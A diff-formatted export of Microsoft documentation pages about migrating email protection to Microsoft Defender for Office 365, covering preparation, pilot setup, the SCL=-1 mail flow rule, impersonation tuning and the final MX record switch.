-5. [Use data from user reported messages to measure and adjust](#step-5-use-data-from-user-reported-messages-to-measure-and-adjust)
-6. [(Optional) Add more users to your pilot and iterate](#step-6-optional-add-more-users-to-your-pilot-and-iterate)
-7. [Extend Microsoft 365 protection to all users and turn off the SCL=-1 mail flow rule](#step-7-extend-microsoft-365-protection-to-all-users-and-turn-off-the-scl-1-mail-flow-rule)
-8. [Switch your MX records](#step-8-switch-your-mx-records)
-
-## Step 1: Begin onboarding Security Teams
-
-If your organization has a security response team, now is the time to begin integrating Microsoft Defender for Office 365 into your response processes, including ticketing systems. This process is an entire topic unto itself, but it's sometimes overlooked. Getting the security response team involved early ensures that your organization is ready to deal with threats when you switch your MX records. Incident response needs to be well equipped to handle the following tasks:
--- Learn the new tools and integrate them into existing flows. For example:
- - Admin management of quarantined messages is important. For instructions, see [Manage quarantined messages and files as an admin](quarantine-admin-manage-messages-files.md).
- - Message trace allows you to see what happened to messages as they enter or leave Microsoft 365. For more information, see [Message trace in the modern Exchange admin center in Exchange Online](/exchange/monitoring/trace-an-email-message/message-trace-modern-eac).
-- Identify risks that might have been let into the organization.-- Tune and customize [alerts](alert-policies-defender-portal.md) for organizational processes.-- Manage the incident queue and remediate potential risks.-
-If your organization purchased Microsoft Defender for Office 365 Plan 2, they should begin familiarizing themselves with and using features such as Threat Explorer, Advanced Hunting, and Incidents. For relevant trainings, see <https://aka.ms/mdoninja>.
-
-If your security response team collects and analyzes unfiltered messages, you can configure a SecOps mailbox to receive these unfiltered messages. For instructions, see [Configure SecOps mailboxes in the advanced delivery policy](advanced-delivery-policy-configure.md#use-the-microsoft-defender-portal-to-configure-secops-mailboxes-in-the-advanced-delivery-policy).
-
-### SIEM/SOAR
-
-For more information about integrating with your SIEM/SOAR, see the following articles:
--- [Overview of Microsoft Defender XDR APIs](/microsoft-365/security/defender/api-overview)-- [Streaming API](/microsoft-365/security/defender/streaming-api)-- [Advanced Hunting API](/microsoft-365/security/defender/api-advanced-hunting)-- [Incidents APIs](/microsoft-365/security/defender/api-incident)-
-If your organization doesn't have a security response team or existing process flows, you can use this time to familiarize yourself with basic hunting and response features in Defender for Office 365. For more information, see [Threat investigation and response](office-365-ti.md).
-
-### RBAC roles
-
-Permissions in Defender for Office 365 are based on role-based access control (RBAC) and is explained in Permissions in the [Microsoft Defender portal](mdo-portal-permissions.md). Here are the important points to keep in mind:
--- Microsoft Entra roles give permissions to **all** workloads in Microsoft 365. For example, if you add a user to the Security Administrator in the Azure portal, they have Security Administrator permissions everywhere.-- Email & collaboration roles in the Microsoft Defender portal give permissions to the Microsoft Defender portal and the Microsoft Purview compliance portal. For example, if you add a user to Security Administrator in the Microsoft Defender portal, they have Security Administrator access **only** in the Microsoft Defender portal and the Microsoft Purview compliance portal.-- Many features in the Microsoft Defender portal are based on Exchange Online PowerShell cmdlets and therefore require role group membership in the corresponding roles (technically, role groups) in Exchange Online (in particular, for access to the corresponding Exchange Online PowerShell cmdlets).-- There are Email & collaboration roles in the Microsoft Defender portal that have no equivalent to Microsoft Entra roles, and are important for security operations (for example the Preview role and the Search and Purge role).-
-Typically, only a subset of security personnel needs additional rights to download messages directly from user mailboxes. This need requires an additional permission that Security Reader doesn't have by default.
-
-## Step 2: (Optional) Exempt pilot users from filtering by your existing protection service
-
-Although this step isn't required, you should consider configuring your pilot users to bypass filtering by your existing protection service. This action allows Defender for Office 365 to handle **all** filtering and protection duties for the pilot users. If you don't exempt your pilot users from your existing protection service, Defender for Office 365 effectively operates only on misses from the other service (filtering messages that have already been filtered).
-
-> [!NOTE]
-> This step is explicitly required if your current protection service provides link wrapping, but you want to pilot Safe Links functionality. Double wrapping of links is not supported.
-
-## Step 3: Tune spoof intelligence
-
-Check the [Spoof intelligence insight](anti-spoofing-spoof-intelligence.md) to see what's being allowed or blocked as spoofing, and to determine if you need to override the system verdict for spoofing. Some sources of your business-critical email might have misconfigured email authentication records in DNS (SPF, DKIM, and DMARC) and you might be using overrides in your existing protection service to mask their domain issues.
-
-Spoof intelligence can rescue email from domains without proper email authentication records in DNS, but the feature sometimes needs assistance in distinguishing good spoofing from bad spoofing. Focus on the following types of message sources:
--- Message sources that are outside of the IP address ranges defined in [Enhanced Filtering for Connectors](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/enhanced-filtering-for-connectors).-- Message sources that have the highest number of messages.-- Message sources that have the highest impact on your organization.-
-Spoof intelligence will eventually tune itself after you configure user reported settings, so there's no need for perfection.
-
-## Step 4: Tune impersonation protection and mailbox intelligence
-
-After you've had enough time to observe the results of impersonation protection in **Don't apply any action** mode, you can individually turn on each impersonation protection action in the anti-phishing policies:
--- User impersonation protection: **Quarantine the message** for both Standard and Strict.-- Domain impersonation protection: **Quarantine the message** for both Standard and Strict.-- Mailbox intelligence protection: **Move the message to the recipients' Junk Email folders** for Standard; **Quarantine the message** for Strict.-
-The longer you monitor the impersonation protection results without acting on the messages, the more data you have to identify allows or blocks that might be required. Consider using a delay between turning on each protection that's significant enough to allow for observation and adjustment.
-
-> [!NOTE]
-> Frequent and continuous monitoring and tuning of these protections is important. If you suspect a false positive, investigate the cause and use overrides only as necessary and only for the detection feature that requires it.
-
-### Tune mailbox intelligence
-
-Although mailbox intelligence is configured to take no action on messages that were [determined to be impersonation attempts](anti-phishing-mdo-impersonation-insight.md), it's turned on and learning the email sending and receiving patterns of the pilot users. If an external user is in contact with one your pilot users, messages from that external user aren't identified as impersonation attempts by mailbox intelligence (thus reducing false positives).
-
-When you're ready, do the following steps to allow mailbox intelligence to act on messages that are detected as impersonation attempts:
--- In the anti-phishing policy with the Standard protection settings, change the value of **If mailbox intelligence detects an impersonated user** to **Move message to recipients' Junk Email folders**.--- In the anti-phishing policy with the Strict protection settings, change the value of **If mailbox intelligence detects and impersonated user** from to **Quarantine the message**.-
-To modify the policies, see [Configure anti-phishing policies in Defender for Office 365](anti-phishing-policies-mdo-configure.md).
-
-After you observed the results and made any adjustments, proceed to the next section to quarantine messages detected by user impersonation.
-
-### Tune user impersonation protection
-
-In both of your anti-phishing policies based on Standard and Strict settings, change the value of **If a message is detected as user impersonation** to **Quarantine the message**.
-
-Check the [impersonation insight](anti-phishing-mdo-impersonation-insight.md) to see what's being blocked as user impersonation attempts.
-
-To modify the policies, see [Configure anti-phishing policies in Defender for Office 365](anti-phishing-policies-mdo-configure.md).
-
-After you've observed the results and made any adjustments, proceed to the next section to quarantine messages detected by domain impersonation.
-
-### Tune domain impersonation protection
-
-In both of your anti-phishing policies based on Standard and Strict settings, change the value of **If a message is detected as domain impersonation** to **Quarantine the message**.
-
-Check the [impersonation insight](anti-phishing-mdo-impersonation-insight.md) to see what's being blocked as domain impersonation attempts.
-
-To modify the policies, see [Configure anti-phishing policies in Defender for Office 365](anti-phishing-policies-mdo-configure.md).
-
-Observe the results and make any adjustments as necessary.
-
-## Step 5: Use data from user reported messages to measure and adjust
-
-As your pilot users report false positives and false negatives, the messages appear on the **User reported** tab of the [Submissions page in the Microsoft Defender portal](submissions-admin.md). You can report the misidentified messages to Microsoft for analysis and use the information to adjust the settings and exceptions in your pilot policies as necessary.
-
-Use the following features to monitor and iterate on the protection settings in Defender for Office 365:
--- [Quarantine](quarantine-admin-manage-messages-files.md)-- [Threat Explorer (Explorer)](threat-explorer-real-time-detections-about.md)-- [Email security reports](reports-email-security.md)-- [Defender for Office 365 reports](reports-defender-for-office-365.md)-- [Mail flow insights](/exchange/monitoring/mail-flow-insights/mail-flow-insights)-- [Mail flow reports](/exchange/monitoring/mail-flow-reports/mail-flow-reports)-
-If your organization uses a third-party service for user reported messages, you can integrate that data into your feedback loop.
-
-## Step 6: (Optional) Add more users to your pilot and iterate
-
-As you find and fix issues, you can add more users to the pilot groups (and correspondingly exempt those new pilot users from scanning by your existing protection service as appropriate). The more testing that you do now, the fewer user issues that you need to deal with later. This "waterfall" approach allows tuning against larger portions of the organization and gives your security teams time to adjust to the new tools and processes.
--- Microsoft 365 generates alerts when high confidence phishing messages are allowed by organizational policies. To identify these messages, you have the following options:
- - Overrides in the [Threat protection status report](reports-email-security.md#threat-protection-status-report).
- - Filter in Threat Explorer to identify the messages.
- - Filter in Advanced Hunting to identify the messages.
-
- Report any false positives to Microsoft as early as possible through [admin submissions](submissions-admin.md), and use the [Tenant Allow/Block List](tenant-allow-block-list-about.md) feature to configure safe overrides for those false positives.
--- It's also a good idea to examine unnecessary overrides. In other words, look at the verdicts that Microsoft 365 would have provided on the messages. If Microsoft 365 rendered the correct verdict, then the need for override is greatly diminished or eliminated.-
-## Step 7: Extend Microsoft 365 protection to all users and turn off the SCL=-1 mail flow rule
-
-Do the steps in this section when you're ready to switch your MX records to point to Microsoft 365.
-
-1. Extend the pilot policies to the entire organization. Fundamentally, there are different ways to extend the policies:
- - Use [preset security](preset-security-policies.md) policies and divide your users between the Standard protection profile and the Strict protection profile (make sure everyone is covered). Preset security policies are applied before any custom policies that you've created or any default policies. You can turn off your individual pilot policies without deleting them.
-
- The drawback to preset security policies is you can't change many of the important settings after you've created them.
-
- - Change the scope of the policies that you created and adjusted during the pilot to include all users (for example, all recipients in all domains). Remember, if multiple policies of the same type (for example, anti-phishing policies) apply to the same user (individually, by group membership, or email domain), only the settings of the policy with the highest priority (lowest priority number) are applied, and processing stops for that type of policy.
-
-2. Turn off the SCL=-1 mail flow rule (you can turn it off without deleting it).
-
-3. Verify that the previous changes have taken effect, and that Defender for Office 365 is now properly enabled for all users. At this point, all of the protection features of Defender for Office 365 are now allowed to act on mail for all recipients, but that mail has already been scanned by your existing protection service.
-
-You can pause at this stage for more large-scale data recording and tuning.
-
-## Step 8: Switch your MX records
-
-> [!NOTE]
->
-> - When you switch the MX record for your domain, it can take up to 48 hours for the changes to propagate throughout the internet.
-> - We recommend lowering the TTL value of your DNS records to enable faster response and possible rollback (if required). You can revert to the original TTL value after the switchover is complete and verified.
-> - You should consider starting with changing domains that are used less frequently. You can pause and monitor before moving to larger domains. However, even if you do this, you still should make sure that all users and domains are covered by policies, because secondary SMTP domains are resolved to primary domains prior to the policy application.
-> - Multiple MX records for a single domain will technically work, allowing you to have split routing, provided that you have followed all the guidance in this article. Specifically, you should make sure that policies are applied to all users, that the SCL=-1 mail flow rule is applied only to mail that passes through your existing protection service as described in [Setup Step 3: Maintain or create the SCL=-1 mail flow rule](migrate-to-defender-for-office-365-setup.md#step-3-maintain-or-create-the-scl-1-mail-flow-rule). However, this configuration introduces behavior that makes troubleshooting much more difficult, and therefore we do not typically recommend it, especially for extended periods of time.
-> - Before you switch your MX records, verify that the following settings are not enabled on the inbound connector from the protection service to Microsoft 365. Typically, the connector will have one or more of the following settings configured:
-> - **and require that the subject name on the certificate that the partner uses to authenticate with Office 365 matches this domain name** (*RestrictDomainsToCertificate*)
-> - **Reject email messages if they aren't sent from within this IP address range** (*RestrictDomainsToIPAddresses*)
-> If the connector type is **Partner** and either of these settings are turned on, all mail delivery to your domains will fail after you switch your MX records. You need to disable these settings before you continue. If the connector is an on-premises connector that's used for hybrid, you don't need to modify the on-premises connector. But, you can still check for the presence of a **Partner** connector.
-> - If your current mail gateway is also providing recipient validation, you may want to check that the domain is configured as [Authoritative](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains) in Microsoft 365. This can prevent unnecessary bounce messages.
-
-When you're ready, switch the MX record for your domains. You can migrate all of your domains at once. Or, you can migrate less frequently used domains first, and then migrate the rest later.
-
-Feel free to pause and evaluate here at any point. But, remember: once you turn off the SCL=-1 mail flow rule, users might have two different experiences for checking false positives. The sooner you can provide a single, consistent experience, the happier your users and help desk teams will be when they have to troubleshoot a missing message.
-
-## Next steps
-
-Congratulations! You have completed your [migration to Microsoft Defender for Office 365](migrate-to-defender-for-office-365.md#the-migration-process)! Because you followed the steps in this migration guide, the first few days where mail is delivered directly into Microsoft 365 should be much smoother.
-
-Now you begin the normal operation and maintenance of Defender for Office 365. Monitor and watch for issues that are similar to what you experienced during the pilot, but on a larger scale. The [spoof intelligence insight](anti-spoofing-spoof-intelligence.md) and the [impersonation insight](anti-phishing-mdo-impersonation-insight.md) are most helpful, but consider making the following activities a regular occurrence:
--- Review user reported messages, especially [user-reported phishing messages](air-examples.md)-- Review overrides in the [Threat protection status report](reports-email-security.md#threat-protection-status-report).-- Use [Advanced Hunting](/microsoft-365/security/defender/advanced-hunting-example) queries to look for tuning opportunities and risky messages.
security Migrate To Defender For Office 365 Prepare https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/migrate-to-defender-for-office-365-prepare.md
-- Title: "Migrate to Microsoft Defender for Office 365 Phase 1: Prepare"
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - m365solution-mdo-migration
- - highpri
- - tier1
-
-description: "Prerequisite steps for migrating from a third-party protection service or device to Microsoft Defender for Office 365 protection."
- Previously updated : 6/15/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Migrate to Microsoft Defender for Office 365 - Phase 1: Prepare
-
-<br/>
-
-|:::image type="content" source="../../medi)|
-||||
-|*You are here!*|||
-
-Welcome to **Phase 1: Prepare** of your **[migration to Microsoft Defender for Office 365](migrate-to-defender-for-office-365.md#the-migration-process)**! This migration phase includes the following steps. You should inventory the settings at your existing protection service first, before you make any changes. Otherwise, you can do the remaining steps in any order:
-
-1. [Inventory the settings at your existing protection service](#inventory-the-settings-at-your-existing-protection-service)
-2. [Check your existing protection configuration in Microsoft 365](#check-your-existing-protection-configuration-in-microsoft-365)
-3. [Check your mail routing configuration](#check-your-mail-routing-configuration)
-4. [Move features that modify messages into Microsoft 365](#move-features-that-modify-messages-into-microsoft-365)
-5. [Define spam and bulk user experiences](#define-spam-and-bulk-user-experiences)
-6. [Identify and designate priority accounts](#identify-and-designate-priority-accounts)
-
-## Inventory the settings at your existing protection service
-
-A complete inventory of settings, rules, exceptions, etc. from your existing protection service is a good idea, because you likely won't have access to the information after you cancel your subscription.
-
-**But, it's very important that you do not automatically or arbitrarily recreate all of your existing customizations in Defender for Office 365**. At best, you might introduce settings that are no longer required, relevant, or functional. At worse, some of your previous customizations might actually create security issues in Defender for Office 365.
-
-Your testing and observation of the native capabilities and behavior of Defender for Office 365 ultimately determines the overrides and settings that you need. You might find it helpful to organize the settings from your existing protection service into the following categories:
--- **Connection or content filtering**: You'll likely find that you don't need most of these customizations in Defender for Office 365.-- **Business routing**: Most of the customizations that you need to recreate likely fall into this category. For example, you can recreate these settings in Microsoft 365 as Exchange mail flow rules (also known as transport rules), connectors, and exceptions to spoof intelligence.-
-Instead of moving old settings blindly into Microsoft 365, we recommend a waterfall approach. This approach involves a pilot phase with ever-increasing user membership, and observation-based tuning based on balancing security considerations with organizational business needs.
-
-## Check your existing protection configuration in Microsoft 365
-
-As we stated earlier, it's impossible to completely turn off all protection features for mail that's delivered into Microsoft 365, even when you use a third-party protection service. So, it's not unusual for a Microsoft 365 organization to have at least some email protection features configured. For example:
--- In the past, you weren't using the third-party protection service with Microsoft 365. You might have used and configured some protection features in Microsoft 365 that are currently being ignored. But those settings might take effect as you "turn the dial" to enable the protection features in Microsoft 365.-- You might have accommodations in Microsoft 365 protection for false positives (good mail marked as bad) or false negatives (bad mail allowed) that made it through your existing protection service.-
-Review your existing protection features in Microsoft 365 and consider removing or simplifying settings that are no longer required. A rule or policy setting that was required years ago could put the organization at risk and create unintentional gaps in protection.
-
-## Check your mail routing configuration
--- If you're using any sort of complex routing (for example [Centralized Mail Transport](/exchange/transport-options)), you should consider simplifying your routing and thoroughly documenting it. External hops, especially after Microsoft 365 has already received the message, can complicate configuration and troubleshooting.--- Outbound and relay mail flow is out of the scope for this article. However, you might need to do one or more of the following steps:
- - Verify that all of the domains that you use to send email have the proper SPF records. For more information, see [Set up SPF to help prevent spoofing](email-authentication-spf-configure.md).
- - We strongly recommend that you set up DKIM signing in Microsoft 365. For more information, see [Use DKIM to validate outbound email](email-authentication-dkim-configure.md).
- - If you're not routing mail directly from Microsoft 365, you need to change that routing by removing or changing the outbound connector.
--- Using Microsoft 365 to relay email from your on-premises email servers can be a complex project in itself. A simple example is a small number of apps or devices that send most of their messages to internal recipients and aren't used for mass mailings. See [this guide](/exchange/mail-flow-best-practices/how-to-set-up-a-multifunction-device-or-application-to-send-email-using-microsoft-365-or-office-365) for details. More extensive environments need to be more thoughtful. Marketing email and messages that could be seen as spam by recipients aren't allowed.--- Defender for Office 365 doesn't have a feature for aggregating DMARC reports. Visit the [Microsoft Intelligent Security Association (MISA) catalog](https://www.microsoft.com/misapartnercatalog) to view third-party vendors that offer DMARC reporting for Microsoft 365.-
-## Move features that modify messages into Microsoft 365
-
-You need to transfer any customizations or features that modify messages in any way into Microsoft 365. For example, your existing protection service adds an **External** tag to the subject or message body of messages from external senders. Any link wrapping feature will also cause problems with some messages. If you're using such a feature today, you should prioritize the rollout of Safe Links as an alternative to minimize problems.
-
-If you don't turn off message modification features in your existing protection service, you can expect the following negative results in Microsoft 365:
--- DKIM will break. Not all senders rely on DKIM, but senders that do will fail authentication.-- [Spoof intelligence](anti-phishing-protection-spoofing-about.md) and the tuning step later in this guide won't work properly.-- You'll probably get a high number of false positives (good mail marked as bad).-
-To recreate external sender identification in Microsoft 365, you have the following options:
--- The [Outlook external sender call-out feature](https://techcommunity.microsoft.com/t5/exchange-team-blog/native-external-sender-callouts-on-email-in-outlook/ba-p/2250098), together with [first contact safety tips](anti-phishing-policies-about.md#first-contact-safety-tip).-- Mail flow rules (also known as transport rules). For more information, see [Organization-wide message disclaimers, signatures, footers, or headers in Exchange Online](/exchange/security-and-compliance/mail-flow-rules/disclaimers-signatures-footers-or-headers).-
-Microsoft is working with the industry to support the Authenticated Received Chain (ARC) standard. If you wish to leave any message modification features enabled at your current mail gateway provider, then we recommend contacting them about their plans to support this standard.
-
-## Account for any active phishing simulations
-
-If you have active third-party phishing simulations, you need to prevent the messages, links, and attachments from being identified as phishing by Defender for Office 365. For more information, see [Configure third-party phishing simulations in the advanced delivery policy](advanced-delivery-policy-configure.md#use-the-microsoft-defender-portal-to-configure-third-party-phishing-simulations-in-the-advanced-delivery-policy).
-
-## Define spam and bulk user experiences
--- **Quarantine vs. deliver to Junk Email folder**: The natural and recommended response for malicious and definitely risky messages is to quarantine the messages. But, how do you want your users to handle less harmful messages, such as spam, and bulk mail (also known as *gray mail*)? Should these types of messages be delivered to user Junk Email folders?-
- With our Standard security settings, we generally deliver these less risky types of messages to the Junk Email folder. This behavior is similar to many consumer email offerings, where users can check their Junk Email folder for missing messages, and they can rescue those messages themselves. Or, if the user intentionally signed up for a newsletter or marketing mail, they can choose to unsubscribe or block the sender for their own mailbox.
-
- However, many enterprise users are used to little (if any) mail in their Junk Email folder. Instead, these users are used to checking a quarantine for their missing messages. Quarantine introduces issues of quarantine notifications, notification frequency, and the permissions that are required to view and release messages.
-
- Ultimately, it's your decision if you want to prevent delivery of email to the Junk Email folder in favor of delivery to quarantine. But, one thing is certain: if the experience in Defender for Office 365 is different than what your users are used to, you need to notify them and provide basic training. Incorporate learnings from the pilot and make sure that users are prepared for any new behavior for email delivery.
--- **Wanted bulk mail vs. unwanted bulk mail**: Many protection systems allow users to allow or block bulk email for themselves. These settings don't easily migrate to Microsoft 365, so you should consider working with VIPs and their staff to recreate their existing configurations in Microsoft 365.-
- Today, Microsoft 365 considers some bulk mail (for example, newsletters) as safe based on the message source. Mail from these "safe" sources is currently not marked as bulk (the bulk complaint level or BCL is 0 or 1), so it's difficult to globally block mail from these sources. For most users, the solution is to ask them to individually unsubscribe from these bulk messages or use Outlook to block the sender. But, some users don't like blocking or unsubscribing from bulk messages themselves.
-
- Mail flow rules that filter bulk email can be helpful when VIP users don't wish to manage bulk email themselves. For more information, see [Use mail flow rules to filter bulk email](/exchange/security-and-compliance/mail-flow-rules/use-rules-to-filter-bulk-mail).
-
-## Identify and designate priority accounts
-
-If the feature is available to you, **priority accounts** and **user tags** can help to identify your important Microsoft 365 users so they stand out in reports. For more information, see [User tags in Microsoft Defender for Office 365](user-tags-about.md) and [Manage and monitor priority accounts](/microsoft-365/admin/setup/priority-accounts).
-
-## Next step
-
-**Congratulations**! You have completed the **Prepare** phase of your [migration to Microsoft Defender for Office 365](migrate-to-defender-for-office-365.md#the-migration-process)!
--- Proceed to [Phase 2: Setup](migrate-to-defender-for-office-365-setup.md).
security Migrate To Defender For Office 365 Setup https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/migrate-to-defender-for-office-365-setup.md
- Title: "Migrate to Microsoft Defender for Office 365 Phase 2: Setup"
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - m365solution-mdo-migration
- - highpri
- - tier1
-
-description: "Take the steps to begin migrating from a third-party protection service or device to Microsoft Defender for Office 365 protection."
- Previously updated : 6/15/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Migrate to Microsoft Defender for Office 365 - Phase 2: Setup
-
-<br/>
-
-|[:::image type="content" source="../../medi)|
-||||
-||*You are here!*||
-
-Welcome to **Phase 2: Setup** of your **[migration to Microsoft Defender for Office 365](migrate-to-defender-for-office-365.md#the-migration-process)**! This migration phase includes the following steps:
-
-1. [Create distribution groups for pilot users](#step-1-create-distribution-groups-for-pilot-users)
-2. [Configure user reported message settings](#step-2-configure-user-reported-message-settings)
-3. [Maintain or create the SCL=-1 mail flow rule](#step-3-maintain-or-create-the-scl-1-mail-flow-rule)
-4. [Configure Enhanced Filtering for Connectors](#step-4-configure-enhanced-filtering-for-connectors)
-5. [Create pilot protection policies](#step-5-create-pilot-protection-policies)
-
-## Step 1: Create distribution groups for pilot users
-
-Distribution groups are required in Microsoft 365 for the following aspects of your migration:
--- **Exceptions for the SCL=-1 mail flow rule**: You want pilot users to get the full effect of Defender for Office 365 protection, so you need Defender for Office 365 to scan their incoming messages. You get this result by defining your pilot users in the appropriate distribution groups in Microsoft 365, and configuring these groups as exceptions to the SCL=-1 mail flow rule.-
- As we described in [Onboard Step 2: (Optional) Exempt pilot users from filtering by your existing protection service](migrate-to-defender-for-office-365-onboard.md#step-2-optional-exempt-pilot-users-from-filtering-by-your-existing-protection-service), you should consider exempting these same pilot users from scanning by your existing protection service. Eliminating the possibility of filtering by your existing protection service and relying exclusively on Defender for Office 365 is the best and closest representation of what's going to happen after your migration is complete.
--- **Testing of specific Defender for Office 365 protection features**: Even for the pilot users, you don't want to turn on everything at once. Using a staged approach for the protection features that are in effect for your pilot users makes troubleshooting and adjusting easier. With this approach in mind, we recommend the following distribution groups:
- - **A Safe Attachments pilot group**: For example, **MDOPilot\_SafeAttachments**
- - **A Safe Links pilot group**: For example, **MDOPilot\_SafeLinks**
- - **A pilot group for Standard anti-spam and anti-phishing policy settings**: For example, **MDOPilot\_SpamPhish\_Standard**
- - **A pilot group for Strict anti-spam and anti-phishing policy settings**: For example, **MDOPilot\_SpamPhish\_Strict**
-
-For clarity, we use these specific group names throughout this article, but you're free to use your own naming convention.
-
-When you're ready to begin testing, add these groups as exceptions to [the SCL=-1 mail flow rule](#step-3-maintain-or-create-the-scl-1-mail-flow-rule). As you create policies for the various protection features in Defender for Office 365, use these groups as conditions that define who the policy applies to.
-
-**Notes**:
--- The terms Standard and Strict come from our [recommended security settings](recommended-settings-for-eop-and-office365.md), which are also used in [preset security policies](preset-security-policies.md). Ideally, we would tell you to define your pilot users in the Standard and Strict preset security policies, but we can't do that. Why? Because you can't customize the settings in preset security policies (in particular, actions that are taken on messages). During your migration testing, you want to see what Defender for Office 365 would do to messages, verify that's the result you want, and possibly adjust the policy configurations to allow or prevent those results.-
- So, instead of using preset security policies, you're going to manually create custom policies with settings that are similar to, but in some cases are different than, the settings of Standard and Strict preset security policies.
--- If you want to experiment with settings that **significantly** differ from our Standard or Strict recommended values, you should consider creating and using additional and specific distribution groups for the pilot users in those scenarios. You can use the Configuration Analyzer to see how secure your settings are. For instructions, see [Configuration analyzer for protection policies in EOP and Microsoft Defender for Office 365](configuration-analyzer-for-security-policies.md).-
- For most organizations, the best approach is to start with policies that closely align with our recommended Standard settings. After as much observation and feedback as you're able to do in your available time frame, you can move to more aggressive settings later. Impersonation protection and delivery to the Junk Email folder vs. delivery to quarantine might require customization.
-
- If you use customized policies, just make sure that they're applied _before_ the policies that contain our recommended settings for the migration. If a user is identified in multiple policies of the same type (for example, anti-phishing), only one policy of that type is applied to the user (based on the priority value of the policy). For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
-
-## Step 2: Configure user reported message settings
-
-The ability for users to report false positives or false negatives from Defender for Office 365 is an important part of the migration.
-
-You can specify an Exchange Online mailbox to receive messages that users report as malicious or not malicious. For instructions, see [User reported settings](submissions-user-reported-messages-custom-mailbox.md). This mailbox can receive copies of messages that your users submitted to Microsoft, or the mailbox can intercept messages without reporting them to Microsoft (your security team can manually analyze and submit the messages themselves). However, the interception approach doesn't allow the service to automatically tune and learn.
-
-You should also confirm that all users in the pilot have a supported way to report messages that received an incorrect verdict from Defender for Office 365. These options include:
--- [The built-in Report button in Outlook on the web](submissions-outlook-report-messages.md#use-the-built-in-report-button-in-outlook-on-the-web)-- [The Report Message and Report Phishing add-ins](submissions-outlook-report-messages.md#use-the-report-message-and-report-phishing-add-ins-in-outlook)-- Supported third party reporting tools as described [here](submissions-user-reported-messages-custom-mailbox.md#message-submission-format-for-third-party-reporting-tools).-
-Don't underestimate the importance of this step. Data from user reported messages will give you the feedback loop that you need to verify a good, consistent end-user experience before and after the migration. This feedback helps you to make informed policy configuration decisions, and provide data-backed reports to management that the migration went smoothly.
-
-Instead of relying on data that's based on the experience of the entire organization, more than one migration has resulted in emotional speculation based on a single negative user experience. Furthermore, if you've been running phishing simulations, you can use feedback from your users to inform you when they see something risky that might require investigation.
-
-## Step 3: Maintain or create the SCL=-1 mail flow rule
-
-Because your inbound email is routed through another protection service that sits in front of Microsoft 365, it's likely that you already have a mail flow rule (also known as a transport rule) in Exchange Online that sets the spam confidence level (SCL) of all incoming mail to the value -1 (bypass spam filtering). Most third-party protection services encourage this SCL=-1 mail flow rule for Microsoft 365 customers who want to use their services.
-
-If you're using some other mechanism to override the Microsoft filtering stack (for example, an IP allow list) we recommend that you switch to using an SCL=-1 mail flow rule **as long as** all inbound internet mail into Microsoft 365 comes from the third-party protection service (no mail flows directly from the internet into Microsoft 365).
-
-The SCL=-1 mail flow rule is important during the migration for the following reasons:
--- You can use [Threat Explorer (Explorer)](threat-explorer-real-time-detections-about.md) to see which features in the Microsoft stack *would have* acted on messages without affecting the results from your existing protection service.-- You can gradually adjust who is protected by the Microsoft 365 filtering stack by configuring exceptions to the SCL=-1 mail flow rule. The exceptions are the members of the pilot distribution groups that we recommend later in this article.-
- Before or during the cutover of your MX record to Microsoft 365, you disable this rule to turn on the full protection of the Microsoft 365 protection stack for all recipients in your organization.
-
-For more information, see [Use mail flow rules to set the spam confidence level (SCL) in messages in Exchange Online](/exchange/security-and-compliance/mail-flow-rules/use-rules-to-set-scl).
-
-**Notes**:
--- If you plan to allow internet mail to flow through your existing protection service **and** directly into Microsoft 365 at the same time, you need restrict the SCL=-1 mail flow rule (mail that bypasses spam filtering) to mail that's gone through your existing protection service only. You don't want unfiltered internet mail landing in user mailboxes in Microsoft 365.-
- To correctly identify mail that's already been scanned by your existing protection service, you can add a condition to the SCL=-1 mail flow rule. For example:
-
- - **For cloud-based protection services**: You can use a header and header value that's unique to your organization. Messages that have the header aren't scanned by Microsoft 365. Messages without the header are scanned by Microsoft 365
- - **For on-premises protection services or devices**: You can use source IP addresses. Messages from the source IP addresses aren't scanned by Microsoft 365. Messages that aren't from the source IP addresses are scanned by Microsoft 365.
--- Don't rely exclusively on MX records to control whether mail gets filtered. Senders can easily ignore the MX record and send email directly into Microsoft 365.-
-## Step 4: Configure Enhanced Filtering for Connectors
-
-The first thing to do is configure [Enhanced Filtering for Connectors](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/enhanced-filtering-for-connectors) (also known as *skip listing*) on the connector that's used for mail flow from your existing protection service into Microsoft 365. You can use the [Inbound messages report](/exchange/monitoring/mail-flow-reports/mfr-inbound-messages-and-outbound-messages-reports) to help identify the connector.
-
-Enhanced Filtering for Connectors is required by Defender for Office 365 to see where internet messages actually came from. Enhanced Filtering for Connectors greatly improves the accuracy of the Microsoft filtering stack (especially [spoof intelligence](anti-phishing-protection-spoofing-about.md), and post-breach capabilities in [Threat Explorer](threat-explorer-real-time-detections-about.md) and [Automated Investigation & Response (AIR)](air-about.md).
-
-To correctly enable Enhanced Filtering for Connectors, you need to add the **public** IP addresses of \*\***all\*\*** third-party services and/or on-premises email system hosts that route inbound mail to Microsoft 365.
-
-To confirm that Enhanced Filtering for Connectors is working, verify that incoming messages contain one or both of the following headers:
--- `X-MS-Exchange-SkipListedInternetSender`-- `X-MS-Exchange-ExternalOriginalInternetSender`-
-## Step 5: Create pilot protection policies
-
-By creating production policies, even if they aren't applied to all users, you can test post-breach features like [Threat Explorer](threat-explorer-real-time-detections-about.md) and test integrating Defender for Office 365 into your security response team's processes.
-
-> [!IMPORTANT]
-> Policies can be scoped to users, groups, or domains. We do not recommend mixing all three in one policy, as only users that match all three will fall inside the scope of the policy. For pilot policies, we recommend using groups or users. For production policies, we recommend using domains. It's extremely important to understand that **only** the user's primary email domain determines if the user falls inside the scope of the policy. So, if you switch the MX record for a user's secondary domain, make sure that their primary domain is also covered by a policy.
-
-### Create pilot Safe Attachments policies
